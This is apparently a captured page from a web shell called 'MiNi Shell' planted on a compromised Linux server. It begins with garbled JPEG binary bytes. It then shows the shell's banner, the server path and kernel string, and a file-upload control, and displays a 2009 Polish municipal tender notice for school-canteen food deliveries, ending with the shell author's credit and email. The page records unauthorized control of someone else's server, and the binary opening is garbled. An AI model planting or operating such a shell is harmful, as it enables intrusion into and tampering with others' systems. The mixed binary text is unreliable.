JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090805/128015-N-2009.html

<p class="kh_header"><b>Komarów-Osada: Dostawa artykułów żywnościowych, do stołówki szkolnej przy Szkole Podstawowej w Komarowie-Osadzie w okresie od 1.09.2009 roku do 26.06.2010 roku</b><br>
<b>Numer ogłoszenia: 128015 - 2009; data zamieszczenia: 05.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Komarów-Osada , Rynek 15, 22-435 Komarów-Osada, woj. lubelskie, tel. 084 6153102 w. 50, faks 084 6153185.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.komarowosada.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych, do stołówki szkolnej przy Szkole Podstawowej w Komarowie-Osadzie w okresie od 1.09.2009 roku do 26.06.2010 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych, do stołówki szkolnej przy Szkole Podstawowej w Komarowie-Osadzie w okresie od 1.09.2009 roku do 26.06.2010 roku 
Opis przedmiotu zamówienia 
Przedmiotem zamówienia są dostawy
Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych określonych we Wspólnym Słowniku Zamówień CPV kodem:
- Zadanie Nr I 15100000-9- produkty zwierzęce i przetwory mięsne mięso drobiowe i  podroby
- Zadanie Nr II  15800000-6  różne produkty spożywcze 
- Zadanie Nr III  15331170-9, 15896000-5 warzywa mrożone i produkty głęboko mrożone
- Zadanie Nr IV 15300000-1 owoce, warzywa mrożone i podobne świeże i mrożone
- Zadanie Nr V  15500000-3 produkty mleczarskie
- Zadanie Nr VI 15894300-4   dania gotowe
- Zadanie Nr VII  15811000-6 dostawa pieczywa

Każda ze wskazanych powyżej części zamówienia będzie określana mianem -zadania

Uwaga:  Każde  ZADANIE należy traktować  jako osobną ofertę i  wymagane jest wypełnienie osobnego formularza ofertowego wraz z załącznikiem asortymentowo-cenowym  oraz wymaganych dokumentów i oświadczeń określonych w punkcie VI siwz. Na dostawę produktów żywnościowych należy zawrzeć umowę z dyrektorem Szkoły Podstawowej w Komarowie-Osadzie

Zamawiający dopuszcza składanie ofert częściowych
Zamawiający nie dopuszcza możliwości składania ofert wariantowych
Zamawiający przewiduje udzielenie zamówień uzupełniających których mowa w art. 67 ust. 2 pkt. 7 ustawy PZP
Zamawiający zastrzega sobie możliwość odbioru mniejszych ilości wymienionych produktów bez podania przyczyny, gdyż ilości podane przy poszczególnych artykułach uwzględniają ilości maksymalne.
Wykonawca dostarcza zamówiona partię towaru do zamawiającego własnym środkiem transportu i nie obciążać będzie kosztami transportu zamawiającego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.80.00.00-6, 15.33.11.70-9, 15.89.60.00-5, 15.30.00.00-1, 15.50.00.00-3, 15.89.43.00-4, 15.81.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  zamówienie  mogą się ubiegać wykonawcy, którzy
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24    ust. 1 i 2 Ustawy Prawo Zamówień Publicznych,
- spełnią wymagania zawarte w specyfikacji istotnych warunków zamówienia,
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń zgodnie z formułą   spełnia - nie spełnia,
- oferta nie spełniająca wymagań SIWZ lub ustawie zostanie odrzucona bez rozpatrywania.
Warunek Nr 1 Poświadczenie posiadania uprawnień do wykonywania określonej działalności Znaczenie warunku spełnia-nie spełnia 
1.Wykonawca dołączy do oferty następujące dokumenty poświadczające oraz oświadczenia:
a)	Formularz ofertowy i asortymentowo-cenowy    (zał. Nr 1) i od 1-7
b)	Oświadczenie wykonawcy o spełnieniu warunków w związku z art. 22 ust. 1 i  art. 24           ust. 1 i 2 ustawy Prawo zamówień publicznych  (zał. Nr 8)
c)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)	Oświadczenie wykonawcy o akceptacji ogólnych warunków umowy zawarte w projekcie umowy stanowiącym  (zał. Nr 9) 
Ocena warunku spełnia/nie spełnia bez znaczenia punktowego
 
Warunek Nr 2 Znaczenie - spełnia/ nie spełnia
Ocenie podlegać będzie oferowana cena  dostawy artykułów spożywczych
Ocena warunku dokonywana będzie następująco:
Wykonawca, który przedłoży najkorzystniejszą cenowo ofertę na wykonanie zamówienia otrzyma 100 punktów
 Ocena ofert będzie dokonywana wg następujących zasad: - kryteria ceny - wskaźnik C
 C= Najniższa oferowana cena brutto spośród zakwalifikowanych ofert 
Wartość badanej oferty brutto x100
  
Wykonawca w ofercie poda przewidywanych podwykonawców.
Zamawiający odrzuci ofertę, która:
-	jest niezgodna z ustawą,
-	jej treść nie odpowiada specyfikacji istotnych warunków zamówienia,
-	jej złożenie stanowi czyn nieuczciwej konkurencji,
-	zwiera nisko rażącą cenę w stosunku do przedmiotu zamówienia,
-	została złożona przez wykonawcę wykluczonego z postępowania o udzielenie zamówienia publicznego,
-	zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 87 ust. 2 pkt. 3 błędy w obliczeniu ceny,
-	w terminie 3 dni od dnia otrzymania zawiadomienia Wykonawca nie zgodził się na poprawienie omyłki w obliczeniu ceny,
-	jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wykonawca dołączy do oferty następujące dokumenty poświadczające oraz oświadczenia
1.1.	Formularz oferty na załączonym druku  (zał. nr 1) wraz z formularzem ofertowo-cenowym     
1.2	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
1.3	Oświadczenie wykonawcy o spełnieniu warunków związku z art. 22 ust. 1 i 24 ust. 1  i 2 ustawy zamówień publicznych  zał Nr  2
1.4 Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego        oddziału Zakładu Ubezpieczeń  lub Kasy Rolniczego Ubezpieczenia Społecznego       potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków,       opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń,       że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty       zaległych  płatności lub wstrzymanie  w całości wykonania decyzji właściwego       organu   wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania        ofert. 
       1.5 Oświadczenie wykonawcy o akceptacji ogólnych warunków umowy zawarte                w projekcie umowy stanowiącym  (zał. Nr 4) 
Kopie dokumentów muszą być potwierdzone   za zgodność z oryginałem przez wykonawcę lub   osobę upoważnioną do składania oświadczenia w imieniu wykonawcy.
Jeżeli kserokopia załączonego dokumentu będzie nieczytelna lub budziła wątpliwości, co do jej prawidłowości Zamawiający może żądać przedłożenia przez Wykonawcę oryginału lub notarialnie potwierdzonej kopii.
Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów oraz oświadczeń zgodnie z art. 24 ust. 4 ustawy o zamówieniach publicznych spowoduje wykluczenie go z postępowania.
Brak jakiegokolwiek z wyżej wymienionych dokumentów i oświadczeń spowoduje wykluczenie oferenta z postępowania

2.Jeżeli wykonawca ma siedzibę i miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. VI podpunkt 1.2, i 1.4  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, ze uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
2.	Dokumenty o których mowa w pkt. 2 lit. a i b , powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .Dokument o którym mowa w pkt. 2 lit. c powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.   
3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:
a)	w tym przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,. Pełnomocnictwo musi być dołączone do oferty
b)	 przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców o których mowa w pkt. 3
c)	 jeżeli oferta wykonawców, wykonawców których mowa w pkt.. 3 została wybrana , zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
d)	wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami.
e)	warunki określone w ust. VI  punkt 1  podpunkt 1.2 i 1.4  musi spełniać każdy z wykonawców pozostałe warunki mogą spełniać.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.komarowosada.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Komarów-Osada
ul. Rynek 15, 22-435 Komarów-Osada
I pietro, pokój nr 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 09:10, miejsce: Urząd Gminy Komarów-Osada
ul. Rynek 15, 22-435 Komarów-Osada
I pietro, pokój nr 6 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr I produkty zwierzece i przetwoty mięsne mięso drobiowe i podroby.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zamówienia zawiera  załącznik nr 1 do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Rózne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do specyfikacji istotnych waunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III warzywa mrozone i produkty głęboko mrożone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis przedmiotu zamówienia zawiera zał nr 3 specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 owoce, warzywa mrożone i podobne świeże i mrożone.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis przedmiotu zamówienia zawiera załąćznik nr 4 do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 5 do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 dania gotowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6 do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.43.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do specyfikacji istotnych warunkow zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.18.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com